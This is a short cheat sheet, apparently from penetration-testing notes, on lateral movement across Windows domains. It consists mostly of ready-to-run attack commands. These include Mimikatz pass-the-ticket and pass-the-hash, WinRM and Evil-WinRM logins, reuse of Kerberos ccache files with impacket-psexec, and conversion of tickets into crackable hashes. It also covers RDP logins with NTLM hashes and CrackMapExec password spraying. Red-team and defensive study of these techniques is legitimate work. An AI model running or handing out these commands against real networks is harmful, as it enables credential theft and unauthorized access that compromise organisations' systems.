There aren't many ways to move laterally on Windows. Below are the main ones.
PTH (pass the hash) can be used most of the time.

## Mimikatz Ticket PTT

```powershell
Enable-PSRemoting
mimikatz.exe "kerberos::ptt C:\Users\Public\ticketname.kirbi" "exit"
Enter-PSSession -ComputerName ECORP
```

## WinRM

```powershell
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
```

Evil-WinRM (https://github.com/Hackplayers/evil-winrm):

```bash
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp
```

## PTH with Mimikatz

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'
```

## Pass The Ccache (PTC)

Grab the ccache from the remote host and put it into the environment variable:

```bash
export KRB5CCNAME=/home/morph3/Desktop/krb5cc_012345678_XXXX
```

Make sure the time is synced up with the DC:

```bash
sudo ntpdate -u 192.168.1.231
```

Psexec to the target:

```bash
impacket-psexec morph3@dc01.domain.local -dc-ip 192.168.1.231 -k -no-pass
```

**Note:** Don't include the domain name in psexec. If you are having issues with the command you may remove the username as well.
## Cracking Ccache

Convert the ccache file into a kirbi file using a converter:

```bash
python2 /opt/ticket_converter/ticket_converter.py krb5cc_012345678_XXXX ticket.kirbi
```

Convert the kirbi into a crackable hash:

```bash
python3 /opt/kerberoast/kirbi2john.py ticket.kirbi | tee ticket_hash.txt
```

## RDP

Impacket's rdp_check.py script is good for checking whether credentials are accepted over RDP.

```bash
impacket-rdp_check morph3:Password123@1.3.3.7
python3 /opt/impacket/examples/rdp_check.py ecorp/morph3@1.3.3.7
xfreerdp /u:morph3 /p:Password123 /v:1.3.3.7
xfreerdp /u:morph3 /pth:08df3c74ded740e1f2bcf5dea4b8daf6 /v:1.3.3.7
rdesktop 1.3.3.7 -u Administrator -p 123456
```

## CrackMapExec

Swiss-army-knife tool; handy for password spraying.

```bash
crackmapexec smb ./ips.txt -u ./users -H hashes --local-auth
crackmapexec smb 1.3.3.7 -u ./users -p ./passwords --continue-on-success --shares
```